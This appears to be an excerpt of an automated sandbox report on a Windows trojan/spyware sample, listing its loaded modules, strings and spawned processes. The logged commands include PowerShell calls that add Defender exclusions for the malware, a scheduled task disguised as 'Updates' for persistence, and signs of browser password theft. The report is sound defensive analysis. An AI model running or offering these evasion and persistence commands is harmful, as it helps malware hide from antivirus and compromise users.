                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01440F3015_2_01440F30
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01412FC815_2_01412FC8
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0149EFA015_2_0149EFA0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01420E5915_2_01420E59
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01432E9015_2_01432E90
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0145516C15_2_0145516C
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0140F17215_2_0140F172
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142B1B015_2_0142B1B0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0140D34C15_2_0140D34C
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_014233F315_2_014233F3
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0143B2C015_2_0143B2C0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0143D2F015_2_0143D2F0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_014252A015_2_014252A0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0141146015_2_01411460
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_014674E015_2_014674E0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142349715_2_01423497
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142B73015_2_0142B730
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142995015_2_01429950
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0143B95015_2_0143B950
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142599015_2_01425990
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0148D80015_2_0148D800
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_014238E015_2_014238E0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01495BF015_2_01495BF0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0145DBF915_2_0145DBF9
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0143FB8015_2_0143FB80
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01493A6C15_2_01493A6C
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01423D4015_2_01423D40
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0143FDC015_2_0143FDC0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01439C2015_2_01439C20
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01499C3215_2_01499C32
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01421F9215_2_01421F92
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01429EB015_2_01429EB0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0042EEA315_2_0042EEA3
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_03311AAA16_2_03311AAA
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0330B2EA16_2_0330B2EA
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_033092DA16_2_033092DA
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0332A0AA16_2_0332A0AA
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_033138AE16_2_033138AE
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0330B0C116_2_0330B0C1
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0330B0CA16_2_0330B0CA
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0330942A16_2_0330942A
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0330941E16_2_0330941E
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: String function: 0148EA12 appears 37 times
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: String function: 01467E54 appears 97 times
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: String function: 0120F290 appears 105 times
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: String function: 011FEA12 appears 86 times
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: String function: 0117B970 appears 278 times
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: String function: 011D7E54 appears 102 times
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: String function: 011C5130 appears 58 times
                Source: C6Abn5cBei.exe, 00000000.00000002.1526527209.0000000005778000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevpxg.exe6 vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe, 00000000.00000002.1528650995.0000000006A50000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe, 00000000.00000002.1504108330.0000000002668000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe, 00000000.00000000.1430230994.00000000001FC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamevpxg.exe6 vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe, 00000000.00000002.1508043916.0000000003629000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe, 00000000.00000002.1501916499.000000000077E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe, 00000000.00000002.1526120634.0000000004D90000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe, 00000009.00000002.1874594973.0000000000C28000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameREGINI.EXEj% vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe, 00000009.00000002.1875207587.000000000127D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe | Binary or memory string: OriginalFilenamevpxg.exe6 vs C6Abn5cBei.exe
                Source: C6Abn5cBei.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C6Abn5cBei.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: zdDlscHlw.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/16@4/4
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | File created: C:\Users\user\AppData\Roaming\zdDlscHlw.exe
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3528:120:WilError_03
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | File created: C:\Users\user\AppData\Local\Temp\tmpE61C.tmp
                Source: C6Abn5cBei.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C6Abn5cBei.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: regini.exe, 00000011.00000003.2074623677.0000000003420000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000003.2065344002.0000000003415000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2686703437.0000000003443000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000003.2065140297.00000000033F4000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2686703437.0000000003415000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C6Abn5cBei.exe | ReversingLabs: Detection: 63%
                Source: C6Abn5cBei.exe | Virustotal: Detection: 65%
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | File read: C:\Users\user\Desktop\C6Abn5cBei.exe
                Source: unknown | Process created: C:\Users\user\Desktop\C6Abn5cBei.exe "C:\Users\user\Desktop\C6Abn5cBei.exe"
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zdDlscHlw.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Process created: C:\Users\user\Desktop\C6Abn5cBei.exe "C:\Users\user\Desktop\C6Abn5cBei.exe"
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\zdDlscHlw.exe C:\Users\user\AppData\Roaming\zdDlscHlw.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmp175E.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Process created: C:\Users\user\AppData\Roaming\zdDlscHlw.exe "C:\Users\user\AppData\Roaming\zdDlscHlw.exe"
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe | Process created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: slc.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
